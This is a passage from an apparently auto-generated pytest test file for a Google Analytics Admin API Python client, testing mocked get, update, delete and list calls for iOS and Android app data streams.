call was made with the expected # request object values. 
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0].name == "name_value"


@pytest.mark.asyncio
async def test_delete_ios_app_data_stream_flattened_error_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        await client.delete_ios_app_data_stream(
            analytics_admin.DeleteIosAppDataStreamRequest(), name="name_value",
        )


def test_update_ios_app_data_stream(
    transport: str = "grpc", request_type=analytics_admin.UpdateIosAppDataStreamRequest
):
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.update_ios_app_data_stream), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.IosAppDataStream(
            name="name_value",
            firebase_app_id="firebase_app_id_value",
            bundle_id="bundle_id_value",
            display_name="display_name_value",
        )
        response = client.update_ios_app_data_stream(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.UpdateIosAppDataStreamRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.IosAppDataStream)
    assert response.name == "name_value"
    assert response.firebase_app_id == "firebase_app_id_value"
    assert response.bundle_id == "bundle_id_value"
    assert response.display_name == "display_name_value"


def test_update_ios_app_data_stream_from_dict():
    test_update_ios_app_data_stream(request_type=dict)


def test_update_ios_app_data_stream_empty_call():
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.update_ios_app_data_stream), "__call__"
    ) as call:
        client.update_ios_app_data_stream()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.UpdateIosAppDataStreamRequest()


@pytest.mark.asyncio
async def test_update_ios_app_data_stream_async(
    transport: str = "grpc_asyncio",
    request_type=analytics_admin.UpdateIosAppDataStreamRequest,
):
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.update_ios_app_data_stream), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.IosAppDataStream(
                name="name_value",
                firebase_app_id="firebase_app_id_value",
                bundle_id="bundle_id_value",
                display_name="display_name_value",
            )
        )
        response = await client.update_ios_app_data_stream(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.UpdateIosAppDataStreamRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.IosAppDataStream)
    assert response.name == "name_value"
    assert response.firebase_app_id == "firebase_app_id_value"
    assert response.bundle_id == "bundle_id_value"
    assert response.display_name == "display_name_value"


@pytest.mark.asyncio
async def test_update_ios_app_data_stream_async_from_dict():
    await test_update_ios_app_data_stream_async(request_type=dict)


def test_update_ios_app_data_stream_field_headers():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.UpdateIosAppDataStreamRequest()
    request.ios_app_data_stream.name = "ios_app_data_stream.name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.update_ios_app_data_stream), "__call__"
    ) as call:
        call.return_value = resources.IosAppDataStream()
        client.update_ios_app_data_stream(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert (
        "x-goog-request-params",
        "ios_app_data_stream.name=ios_app_data_stream.name/value",
    ) in kw["metadata"]


@pytest.mark.asyncio
async def test_update_ios_app_data_stream_field_headers_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.UpdateIosAppDataStreamRequest()
    request.ios_app_data_stream.name = "ios_app_data_stream.name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.update_ios_app_data_stream), "__call__"
    ) as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.IosAppDataStream()
        )
        await client.update_ios_app_data_stream(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert (
        "x-goog-request-params",
        "ios_app_data_stream.name=ios_app_data_stream.name/value",
    ) in kw["metadata"]


def test_update_ios_app_data_stream_flattened():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.update_ios_app_data_stream), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.IosAppDataStream()
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.update_ios_app_data_stream(
            ios_app_data_stream=resources.IosAppDataStream(name="name_value"),
            update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
        )

        # Establish that the underlying call was made with the expected
        # request object values.
assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].ios_app_data_stream == resources.IosAppDataStream( name="name_value" ) assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) def test_update_ios_app_data_stream_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.update_ios_app_data_stream( analytics_admin.UpdateIosAppDataStreamRequest(), ios_app_data_stream=resources.IosAppDataStream(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) @pytest.mark.asyncio async def test_update_ios_app_data_stream_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_ios_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.IosAppDataStream() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.IosAppDataStream() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.update_ios_app_data_stream( ios_app_data_stream=resources.IosAppDataStream(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. 
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0].ios_app_data_stream == resources.IosAppDataStream(
            name="name_value"
        )
        assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"])


@pytest.mark.asyncio
async def test_update_ios_app_data_stream_flattened_error_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        await client.update_ios_app_data_stream(
            analytics_admin.UpdateIosAppDataStreamRequest(),
            ios_app_data_stream=resources.IosAppDataStream(name="name_value"),
            update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
        )


def test_list_ios_app_data_streams(
    transport: str = "grpc", request_type=analytics_admin.ListIosAppDataStreamsRequest
):
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_ios_app_data_streams), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = analytics_admin.ListIosAppDataStreamsResponse(
            next_page_token="next_page_token_value",
        )
        response = client.list_ios_app_data_streams(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.ListIosAppDataStreamsRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, pagers.ListIosAppDataStreamsPager)
    assert response.next_page_token == "next_page_token_value"


def test_list_ios_app_data_streams_from_dict():
    test_list_ios_app_data_streams(request_type=dict)


def test_list_ios_app_data_streams_empty_call():
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_ios_app_data_streams), "__call__"
    ) as call:
        client.list_ios_app_data_streams()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.ListIosAppDataStreamsRequest()


@pytest.mark.asyncio
async def test_list_ios_app_data_streams_async(
    transport: str = "grpc_asyncio",
    request_type=analytics_admin.ListIosAppDataStreamsRequest,
):
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_ios_app_data_streams), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            analytics_admin.ListIosAppDataStreamsResponse(
                next_page_token="next_page_token_value",
            )
        )
        response = await client.list_ios_app_data_streams(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.ListIosAppDataStreamsRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, pagers.ListIosAppDataStreamsAsyncPager)
    assert response.next_page_token == "next_page_token_value"


@pytest.mark.asyncio
async def test_list_ios_app_data_streams_async_from_dict():
    await test_list_ios_app_data_streams_async(request_type=dict)


def test_list_ios_app_data_streams_field_headers():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.ListIosAppDataStreamsRequest()
    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_ios_app_data_streams), "__call__"
    ) as call:
        call.return_value = analytics_admin.ListIosAppDataStreamsResponse()
        client.list_ios_app_data_streams(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_list_ios_app_data_streams_field_headers_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.ListIosAppDataStreamsRequest()
    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_ios_app_data_streams), "__call__"
    ) as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            analytics_admin.ListIosAppDataStreamsResponse()
        )
        await client.list_ios_app_data_streams(request)

        # Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_list_ios_app_data_streams_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_ios_app_data_streams), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListIosAppDataStreamsResponse() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.list_ios_app_data_streams(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" def test_list_ios_app_data_streams_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.list_ios_app_data_streams( analytics_admin.ListIosAppDataStreamsRequest(), parent="parent_value", ) @pytest.mark.asyncio async def test_list_ios_app_data_streams_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_ios_app_data_streams), "__call__" ) as call: # Designate an appropriate return value for the call. 
call.return_value = analytics_admin.ListIosAppDataStreamsResponse() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListIosAppDataStreamsResponse() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.list_ios_app_data_streams(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" @pytest.mark.asyncio async def test_list_ios_app_data_streams_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.list_ios_app_data_streams( analytics_admin.ListIosAppDataStreamsRequest(), parent="parent_value", ) def test_list_ios_app_data_streams_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_ios_app_data_streams), "__call__" ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[ resources.IosAppDataStream(), resources.IosAppDataStream(), resources.IosAppDataStream(), ], next_page_token="abc", ), analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[], next_page_token="def", ), analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[resources.IosAppDataStream(),], next_page_token="ghi", ), analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[ resources.IosAppDataStream(), resources.IosAppDataStream(), ], ), RuntimeError, ) metadata = () metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)), ) pager = client.list_ios_app_data_streams(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all(isinstance(i, resources.IosAppDataStream) for i in results) def test_list_ios_app_data_streams_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_ios_app_data_streams), "__call__" ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[ resources.IosAppDataStream(), resources.IosAppDataStream(), resources.IosAppDataStream(), ], next_page_token="abc", ), analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[], next_page_token="def", ), analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[resources.IosAppDataStream(),], next_page_token="ghi", ), analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[ resources.IosAppDataStream(), resources.IosAppDataStream(), ], ), RuntimeError, ) pages = list(client.list_ios_app_data_streams(request={}).pages) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token @pytest.mark.asyncio async def test_list_ios_app_data_streams_async_pager(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_ios_app_data_streams), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[ resources.IosAppDataStream(), resources.IosAppDataStream(), resources.IosAppDataStream(), ], next_page_token="abc", ), analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[], next_page_token="def", ), analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[resources.IosAppDataStream(),], next_page_token="ghi", ), analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[ resources.IosAppDataStream(), resources.IosAppDataStream(), ], ), RuntimeError, ) async_pager = await client.list_ios_app_data_streams(request={},) assert async_pager.next_page_token == "abc" responses = [] async for response in async_pager: responses.append(response) assert len(responses) == 6 assert all(isinstance(i, resources.IosAppDataStream) for i in responses) @pytest.mark.asyncio async def test_list_ios_app_data_streams_async_pages(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_ios_app_data_streams), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[ resources.IosAppDataStream(), resources.IosAppDataStream(), resources.IosAppDataStream(), ], next_page_token="abc", ), analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[], next_page_token="def", ), analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[resources.IosAppDataStream(),], next_page_token="ghi", ), analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[ resources.IosAppDataStream(), resources.IosAppDataStream(), ], ), RuntimeError, ) pages = [] async for page_ in (await client.list_ios_app_data_streams(request={})).pages: pages.append(page_) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token def test_get_android_app_data_stream( transport: str = "grpc", request_type=analytics_admin.GetAndroidAppDataStreamRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_android_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.AndroidAppDataStream( name="name_value", firebase_app_id="firebase_app_id_value", package_name="package_name_value", display_name="display_name_value", ) response = client.get_android_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetAndroidAppDataStreamRequest() # Establish that the response is the type that we expect. 
assert isinstance(response, resources.AndroidAppDataStream) assert response.name == "name_value" assert response.firebase_app_id == "firebase_app_id_value" assert response.package_name == "package_name_value" assert response.display_name == "display_name_value" def test_get_android_app_data_stream_from_dict(): test_get_android_app_data_stream(request_type=dict) def test_get_android_app_data_stream_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_android_app_data_stream), "__call__" ) as call: client.get_android_app_data_stream() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetAndroidAppDataStreamRequest() @pytest.mark.asyncio async def test_get_android_app_data_stream_async( transport: str = "grpc_asyncio", request_type=analytics_admin.GetAndroidAppDataStreamRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_android_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.AndroidAppDataStream( name="name_value", firebase_app_id="firebase_app_id_value", package_name="package_name_value", display_name="display_name_value", ) ) response = await client.get_android_app_data_stream(request) # Establish that the underlying gRPC stub method was called. 
assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetAndroidAppDataStreamRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.AndroidAppDataStream) assert response.name == "name_value" assert response.firebase_app_id == "firebase_app_id_value" assert response.package_name == "package_name_value" assert response.display_name == "display_name_value" @pytest.mark.asyncio async def test_get_android_app_data_stream_async_from_dict(): await test_get_android_app_data_stream_async(request_type=dict) def test_get_android_app_data_stream_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetAndroidAppDataStreamRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_android_app_data_stream), "__call__" ) as call: call.return_value = resources.AndroidAppDataStream() client.get_android_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_get_android_app_data_stream_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetAndroidAppDataStreamRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.get_android_app_data_stream), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.AndroidAppDataStream() ) await client.get_android_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_get_android_app_data_stream_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_android_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.AndroidAppDataStream() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.get_android_app_data_stream(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_get_android_app_data_stream_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.get_android_app_data_stream( analytics_admin.GetAndroidAppDataStreamRequest(), name="name_value", ) @pytest.mark.asyncio async def test_get_android_app_data_stream_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.get_android_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.AndroidAppDataStream() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.AndroidAppDataStream() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_android_app_data_stream(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_android_app_data_stream_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.get_android_app_data_stream( analytics_admin.GetAndroidAppDataStreamRequest(), name="name_value", ) def test_delete_android_app_data_stream( transport: str = "grpc", request_type=analytics_admin.DeleteAndroidAppDataStreamRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_android_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None response = client.delete_android_app_data_stream(request) # Establish that the underlying gRPC stub method was called. 
assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteAndroidAppDataStreamRequest() # Establish that the response is the type that we expect. assert response is None def test_delete_android_app_data_stream_from_dict(): test_delete_android_app_data_stream(request_type=dict) def test_delete_android_app_data_stream_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_android_app_data_stream), "__call__" ) as call: client.delete_android_app_data_stream() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteAndroidAppDataStreamRequest() @pytest.mark.asyncio async def test_delete_android_app_data_stream_async( transport: str = "grpc_asyncio", request_type=analytics_admin.DeleteAndroidAppDataStreamRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_android_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) response = await client.delete_android_app_data_stream(request) # Establish that the underlying gRPC stub method was called. 
assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteAndroidAppDataStreamRequest() # Establish that the response is the type that we expect. assert response is None @pytest.mark.asyncio async def test_delete_android_app_data_stream_async_from_dict(): await test_delete_android_app_data_stream_async(request_type=dict) def test_delete_android_app_data_stream_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteAndroidAppDataStreamRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_android_app_data_stream), "__call__" ) as call: call.return_value = None client.delete_android_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_delete_android_app_data_stream_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteAndroidAppDataStreamRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_android_app_data_stream), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) await client.delete_android_app_data_stream(request) # Establish that the underlying gRPC stub method was called. 
assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_delete_android_app_data_stream_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_android_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.delete_android_app_data_stream(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_delete_android_app_data_stream_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.delete_android_app_data_stream( analytics_admin.DeleteAndroidAppDataStreamRequest(), name="name_value", ) @pytest.mark.asyncio async def test_delete_android_app_data_stream_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_android_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. 
